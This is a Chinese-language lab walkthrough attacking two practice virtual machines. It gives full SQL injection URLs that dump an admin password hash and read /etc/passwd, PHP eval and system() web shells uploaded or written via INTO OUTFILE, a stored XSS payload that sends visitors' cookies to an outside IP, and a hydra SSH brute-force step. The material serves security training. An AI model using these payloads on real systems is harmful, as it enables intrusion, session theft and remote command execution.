web 攻擊靶機

 

 

 

1、sql注入靶機攻擊

首先搭建虛擬機 用kali掃描下當前網段netdiscover -r 192.168.2.0/24

發現可疑ip地址192.168.2.129

並使用nmap掃描這個ip地址，發現其開放了ftp和http協議

打開該虛擬機提供的網頁，發現該網站使用url傳參，可能存在sql注入點

在id=1後加一個引號，網頁報錯 該網站存在sql注入漏洞

 

 

使用order by語句試出網站後臺數據庫表的列數 當order by 5 時網頁報錯 所以該查詢涉及到四列元素

使用聯合查詢 查看網頁的顯示位，獲得顯示位就能夠顯示數據庫的名字 photoblog

http://192.168.2.129/cat.php?id=-2%20union%20select%201,database%20(),3,4

 

獲得數據庫名字 能夠查詢數據庫中有那些表http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

 通常狀況下users表對咱們有用

http://192.168.2.129/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

繼續查詢users表中列名，有變量名 id，login，password

查看users表中的數據：id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

http://192.168.2.129/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

 

 MD5解密後，獲得密碼P4ssw0rd

登陸到管理員頁面

嘗試上傳文件，<?php eval($_POST['a'])?>

發現nophp

改完後綴名發現，能夠繞過，並上傳成功

http://192.168.2.129/admin/uploads/123456.pHp

 獲得目錄，菜刀鏈接

2.xss靶機攻擊

nmap 掃描192.168.2.130發現靶機開着80端口和ssh協議

測試

 

 

有窗口彈出，證實存在漏洞

在靶機上留言<script>document.write('<img src="http://172.22.152.33/?'+document.cookie+' "/>')</script>

能夠將任意登陸用戶的cookie發送到指定ip 在指定 ip 接受 cookie 後能夠僞形成登錄者

 

登陸界面：使用密碼和用戶名進行登陸

獲取到的cookie

使用cookie再次進行登陸：發現已經已admin的身份登陸進頁面中。

進入管理界面後，發現博客編輯界面存在sql注入漏洞

 

 

http://192.168.2.130/admin/edit.php?id=4 union select 1,2,3,4

發現2和3能夠顯示出來。

 

 

 

 http://192.168.2.130/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

能夠讀取passwd文件，可是不能讀取shadow文件。

咱們嘗試能不能建立一個文件。

在編輯頁面發現錯誤提示中有/var/www/classes 目錄，

 

 

嘗試後發現/var/www/css 目錄可寫。

因而構造語句：

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

而後打開

http://192.168.2.130/css/s.php

 

說明s.php文件成功寫入到/var/www/css 目錄，下面將

<?php system($_GET['c']); ?>

寫入z.php中，構造url爲：

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

訪問z.php，並使用uname -a獲取系統信息。能夠遠程執行命令。

下面寫入一句話木馬，構造url：

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀連接：

下面寫入一句話木馬，構造url：

http://192.168.2.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀連接：

發現機器開了ssh，所以用hydra爆破下：

 ssh登錄